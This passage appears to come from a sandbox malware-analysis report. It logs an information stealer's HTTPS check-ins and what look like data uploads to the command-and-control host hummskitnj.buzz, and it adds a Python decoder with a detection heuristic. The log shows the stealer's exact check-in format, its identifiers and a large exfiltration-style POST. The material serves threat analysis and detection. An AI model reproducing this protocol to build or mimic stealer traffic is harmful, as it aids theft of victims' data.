2024-12-27 12:11:09 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 42
    Host: hummskitnj.buzz
2024-12-27 12:11:09 UTC | 42 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6e 62 59 52 4b 6c 2d 2d 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=nbYRKl--&j=
2024-12-27 12:11:10 UTC | 1120 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 12:11:10 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=216iecdtnmpvk3f9v7efhk2tuc; expires=Tue, 22 Apr 2025 05:57:48 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zacaK5hw9CUTFmuWXN1SM6IQhWMJInbKINGSGAFQuxAiyphzTPDwqjgoHUSMih0Uf%2FKB2AKiMIUrAmdJ5d2Xf4Ocb9eJ6LVToabLjoJgvEisGMeE1kNbYBVUdKDPN2zqGVQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f893629cd7c43bb-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=3453&min_rtt=1741&rtt_var=1852&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=941&delivery_rate=1677197&cwnd=228&unsent_bytes=0&cid=5465aa7439b90c11&ts=785&x=0"
(IN data chunks at 2024-12-27 12:11:10 UTC carry the chunked response body, opaque base64-looking text; raw hex and ASCII dumps omitted)
                                                                                                        Data Ascii: 2c651c7kpZ32HTl7nAIU++2vGSb3iBD4TOMaWt6CMVjPj270wqztgG+k7H79VxX+XSo9K8PJTdw1jhYr5/9pRfrHG+2uEeG9l6FJFqhOKLpx3hl764lUrZmyLguDpjF9w94njY/N4IzSXRFXgCIc9/iTaT7PtBHABLtTKt+qMSXC2yqkhuzsxJpAiO5xU1GuuZMp+9uBDJg82icSvwYxZcM6H+yv9YGcQ1BILtUXDI4dzjlX65AZISmKBxLm4
                                                                                                        2024-12-27 12:11:10 UTC1369INData Raw: 47 4f 75 43 47 76 50 69 51 7a 31 46 73 37 6a 48 54 63 61 61 68 69 6d 45 66 79 75 32 70 51 59 45 69 34 6b 66 54 32 77 68 59 6d 34 49 6e 31 63 37 4a 34 66 78 79 58 56 45 57 4e 48 5a 4a 32 36 53 7a 49 5a 66 37 36 53 6d 46 58 5a 38 75 6a 2b 66 2f 4e 42 79 44 6d 78 76 51 64 69 78 6c 6e 61 35 63 61 52 65 6f 42 6e 43 36 74 5a 63 67 49 72 61 59 66 4d 78 49 68 31 74 62 6f 74 74 56 52 4a 72 47 52 36 58 33 39 4b 6d 64 39 6c 31 73 47 6f 45 48 55 62 62 39 33 7a 32 37 44 30 30 70 68 51 47 43 57 69 66 76 5a 7a 77 41 36 7a 2f 65 75 4d 4c 4d 32 49 44 50 47 58 45 76 79 58 4a 49 32 6b 44 54 41 45 4d 4b 36 42 48 34 42 4c 73 61 78 39 50 62 43 46 69 62 67 68 4a 77 39 75 6a 6b 78 4e 64 6f 51 4a 4c 46 43 32 43 37 6e 4e 49 34 51 70 61 59 4b 4a 6b 56 6e 78 74 79 6e 71 70 64 45 59
                                                                                                        Data Ascii: GOuCGvPiQz1Fs7jHTcaahimEfyu2pQYEi4kfT2whYm4In1c7J4fxyXVEWNHZJ26SzIZf76SmFXZ8uj+f/NByDmxvQdixlna5caReoBnC6tZcgIraYfMxIh1tbottVRJrGR6X39Kmd9l1sGoEHUbb93z27D00phQGCWifvZzwA6z/euMLM2IDPGXEvyXJI2kDTAEMK6BH4BLsax9PbCFibghJw9ujkxNdoQJLFC2C7nNI4QpaYKJkVnxtynqpdEY


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 172.67.216.236 | 443 | 6396 | C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 12:11:12 UTC | 271 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=UP3JMVGJ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12770
    Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:12 UTC12770OUTData Raw: 2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
Data Ascii:
    --UP3JMVGJ
    Content-Disposition: form-data; name="hwid"

    FE2FA5131359532BBEBA0C6A975F1733
    --UP3JMVGJ
    Content-Disposition: form-data; name="pid"

    2
    --UP3JMVGJ
    Content-Disposition: form-data; name="lid"

    nbYRKl--
    --UP3JMVGJ
    Content-Disposition:
2024-12-27 12:11:12 UTC | 1127 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 12:11:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=n016esk58o7ffhivdtpdaemcpk; expires=Tue, 22 Apr 2025 05:57:51 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HTXH0abNMl3uKHZDf6v8uQDjk2xGYLZDpOkc8kEoXt%2FAqds4jzyEjEEcml0MdMIRom8cujlNwNWYHLFW5Y5J1dYnxLfgGIhXdOMCjHBgpNS8gPAHffck%2FyLF%2FwTWPFzTTI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f893639182bde96-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1506&rtt_var=568&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13699&delivery_rate=1938911&cwnd=224&unsent_bytes=0&cid=354f3eb2eb925736&ts=864&x=0"
2024-12-27 12:11:12 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii:
        f
        ok 8.46.123.189
2024-12-27 12:11:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii:
        0
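
Sessions 4 to 8 are the same exchange repeated: a multipart/form-data POST to /api on hummskitnj.buzz whose first three parts are named hwid, pid and lid, answered by a chunked text/html body that decodes to "ok 8.46.123.189". The hwid (FE2FA5131359532BBEBA0C6A975F1733) and lid (nbYRKl--) are identical in every session; only the pid part changes (2, 2, 3, 1, 1) and the Content-Length grows with whatever follows the third part. The Python below is an added example for this report, not Joe Sandbox output and not code belonging to the sample: it turns the session 4 "Data Raw" hex dump into bytes, parses the multipart form, decodes the chunked response, and applies a shape check that is derived only from what these five sessions show. The hex constants are copied from the rows above; the sandbox prints only the beginning of the 12770-byte request body, so the dump stops inside a fourth part and the parser has to tolerate that truncation. The meaning of the pid and lid fields is not asserted anywhere in this report and the example does not guess at it.

```python
"""Decode the LummaC check-in captured in session 4 above.

Added example for this report (not Joe Sandbox output, not code from the
sample).  Hex constants are copied from the report's "Data Raw" rows.
"""
import re

# Request Content-Type header, copied from the session 4 OUT record.
CONTENT_TYPE = "multipart/form-data; boundary=UP3JMVGJ"

# Beginning of the request body as dumped by the sandbox; it is cut off
# in the middle of the fourth part's Content-Disposition header.
REQUEST_BODY_HEX = """
2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a
2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a
2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a
2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
"""

# The two IN records that make up the response body: one 15-byte chunk
# followed by the zero-length terminating chunk.
RESPONSE_BODY_HEX = (
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a "
    "30 0d 0a 0d 0a"
)


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a 'Data Raw' hex dump into bytes (fromhex skips whitespace)."""
    return bytes.fromhex(dump)


def boundary_from_content_type(content_type: str) -> bytes:
    """Extract the multipart boundary parameter from a Content-Type value."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if match is None:
        raise ValueError("Content-Type carries no multipart boundary")
    return match.group(1).encode("ascii")


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Map form-data part names to their raw values.

    A part whose header block never terminates (the dump was cut off) is
    skipped instead of being mis-parsed; a closing '--boundary--' ends parsing.
    """
    fields = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):
            break
        headers, terminator, value = part.partition(b"\r\n\r\n")
        if not terminator:
            continue
        name = re.search(rb'\bname="([^"]*)"', headers)
        if name is None:
            continue
        if value.endswith(b"\r\n"):   # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[name.group(1).decode("ascii", "replace")] = value
    return fields


def decode_chunked(data: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-encoded body."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        size = int(data[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)          # last-chunk; trailers are not needed here
        out += data[pos:pos + size]
        pos += size + 2                # skip chunk data and its trailing CRLF


HWID_RE = re.compile(r"^[0-9A-F]{32}$")


def matches_checkin_shape(fields: dict) -> bool:
    """Heuristic taken only from this capture: every POST /api here carries
    hwid (32 upper-case hex digits), a numeric pid and a lid.  It is not a
    published signature; tune it before using it for detection."""
    return ({"hwid", "pid", "lid"} <= set(fields)
            and HWID_RE.match(fields["hwid"]) is not None
            and fields["pid"].isdigit())


def summarize_checkin(content_type: str, request_hex: str, response_hex: str) -> dict:
    """Decode one request/response pair into printable fields and reply text."""
    boundary = boundary_from_content_type(content_type)
    raw_fields = parse_multipart(hexdump_to_bytes(request_hex), boundary)
    fields = {k: v.decode("ascii", "replace") for k, v in raw_fields.items()}
    reply = decode_chunked(hexdump_to_bytes(response_hex)).decode("ascii", "replace")
    return {"fields": fields, "reply": reply, "checkin_shape": matches_checkin_shape(fields)}


if __name__ == "__main__":
    summary = summarize_checkin(CONTENT_TYPE, REQUEST_BODY_HEX, RESPONSE_BODY_HEX)
    for name, value in summary["fields"].items():
        print(f"{name:>5} = {value}")
    print("reply =", summary["reply"])
    print("check-in shape:", summary["checkin_shape"])
```

The response body arrives as two IN records (20 and 5 bytes) and the decoder is fed their concatenation, since the chunk-size line "f" and the terminating "0" chunk only make sense together. The same functions apply unchanged to sessions 5 to 8 by swapping in each session's boundary and hex rows; the truncated fourth part is dropped in every case because its header block never reaches the blank line that separates headers from value.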


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49713 | 172.67.216.236 | 443 | 6396 | C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 12:11:15 UTC | 275 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=VSOVDR18VE0E
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15036
    Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:15 UTC15036OUTData Raw: 2d 2d 56 53 4f 56 44 52 31 38 56 45 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 53 4f 56 44 52 31 38 56 45 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 53 4f 56 44 52 31 38 56 45 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 56 53 4f 56 44 52 31 38 56 45 30 45 0d 0a 43 6f 6e 74 65
Data Ascii:
    --VSOVDR18VE0E
    Content-Disposition: form-data; name="hwid"

    FE2FA5131359532BBEBA0C6A975F1733
    --VSOVDR18VE0E
    Content-Disposition: form-data; name="pid"

    2
    --VSOVDR18VE0E
    Content-Disposition: form-data; name="lid"

    nbYRKl--
    --VSOVDR18VE0E
    Conte
2024-12-27 12:11:15 UTC | 1135 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 12:11:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=lhfp8p0cinmu07ilbug01apc2q; expires=Tue, 22 Apr 2025 05:57:54 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hn8I05VPAstQzFv1uMOUE%2BtpjMeob%2F%2FmOlSz3dCby%2BGmdRN2i%2BvFGQH54oChdK7smYCjkL1wTOEappDFlcOrq%2FVbpBxfQ10koE5PhtGYiRzasEwIrmVtOQ4i%2BwqQ5dRpBpI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f89364c2c2f4393-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2467&min_rtt=2464&rtt_var=931&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15969&delivery_rate=1170340&cwnd=201&unsent_bytes=0&cid=bcae1d94878753b2&ts=854&x=0"
2024-12-27 12:11:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii:
        f
        ok 8.46.123.189
2024-12-27 12:11:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii:
        0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49715 | 172.67.216.236 | 443 | 6396 | C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 12:11:17 UTC | 278 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=6UO45FHKF17435X
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20544
    Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:17 UTC15331OUTData Raw: 2d 2d 36 55 4f 34 35 46 48 4b 46 31 37 34 33 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 55 4f 34 35 46 48 4b 46 31 37 34 33 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 55 4f 34 35 46 48 4b 46 31 37 34 33 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 36 55 4f 34 35 46 48 4b 46 31
Data Ascii:
    --6UO45FHKF17435X
    Content-Disposition: form-data; name="hwid"

    FE2FA5131359532BBEBA0C6A975F1733
    --6UO45FHKF17435X
    Content-Disposition: form-data; name="pid"

    3
    --6UO45FHKF17435X
    Content-Disposition: form-data; name="lid"

    nbYRKl--
    --6UO45FHKF1
                                                                                                        2024-12-27 12:11:17 UTC5213OUTData Raw: 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: F3Wun 4F([:7s~X`nO`i
2024-12-27 12:11:18 UTC | 1123 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 12:11:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=4gqjrjtpudqoaatd2fl9cf64h0; expires=Tue, 22 Apr 2025 05:57:56 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dn7qeflgbyy7lWrdqewUHUQloru%2BLiiWHrMgRlWMNrCc992vomXUtiajxHelsSHZhtHNYWiF34fr4X1zd3TiOtQV08BJEk4alKdmtrWMI9Fetuoh7vlGWx11hFtzAyr62c%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f89365a6ce443f4-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1720&rtt_var=677&sent=16&recv=27&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21502&delivery_rate=1579232&cwnd=194&unsent_bytes=0&cid=85670865a3dfbfda&ts=995&x=0"
2024-12-27 12:11:18 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii:
        f
        ok 8.46.123.189
2024-12-27 12:11:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii:
        0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49725 | 172.67.216.236 | 443 | 6396 | C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 12:11:19 UTC | 275 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=2MG8UBTKWIZSJ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1260
    Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:19 UTC1260OUTData Raw: 2d 2d 32 4d 47 38 55 42 54 4b 57 49 5a 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 4d 47 38 55 42 54 4b 57 49 5a 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4d 47 38 55 42 54 4b 57 49 5a 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 32 4d 47 38 55 42 54 4b 57 49 5a 53 4a 0d 0a 43
Data Ascii:
    --2MG8UBTKWIZSJ
    Content-Disposition: form-data; name="hwid"

    FE2FA5131359532BBEBA0C6A975F1733
    --2MG8UBTKWIZSJ
    Content-Disposition: form-data; name="pid"

    1
    --2MG8UBTKWIZSJ
    Content-Disposition: form-data; name="lid"

    nbYRKl--
    --2MG8UBTKWIZSJ
    C
2024-12-27 12:11:20 UTC | 1122 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 12:11:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=gtqo51ip7n3cjra9vbucnq0jrj; expires=Tue, 22 Apr 2025 05:57:59 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8T8t7n2yyYM1OhXnQbg5xRmgQ0qQjJDXLdfoCul0iSxcKn9ydGxP9q7rzJtOM2lajJqjGmBej5l0HqvvESlB5SEWuNK73bNMGPsNVPrnXG6h%2BACe6xU%2FxBE5krhKj5RAfOE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f89366aebecde9b-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1467&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2171&delivery_rate=1888745&cwnd=192&unsent_bytes=0&cid=3b4235627bd7ed3e&ts=771&x=0"
2024-12-27 12:11:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii:
        f
        ok 8.46.123.189
2024-12-27 12:11:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii:
        0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49733 | 172.67.216.236 | 443 | 6396 | C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 12:11:22 UTC | 276 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=97FF7KQWH025
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 588978
    Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 2d 2d 39 37 46 46 37 4b 51 57 48 30 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 39 37 46 46 37 4b 51 57 48 30 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 37 46 46 37 4b 51 57 48 30 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 39 37 46 46 37 4b 51 57 48 30 32 35 0d 0a 43 6f 6e 74 65
                                                                                                        Data Ascii: --97FF7KQWH025Content-Disposition: form-data; name="hwid"FE2FA5131359532BBEBA0C6A975F1733--97FF7KQWH025Content-Disposition: form-data; name="pid"1--97FF7KQWH025Content-Disposition: form-data; name="lid"nbYRKl----97FF7KQWH025Conte
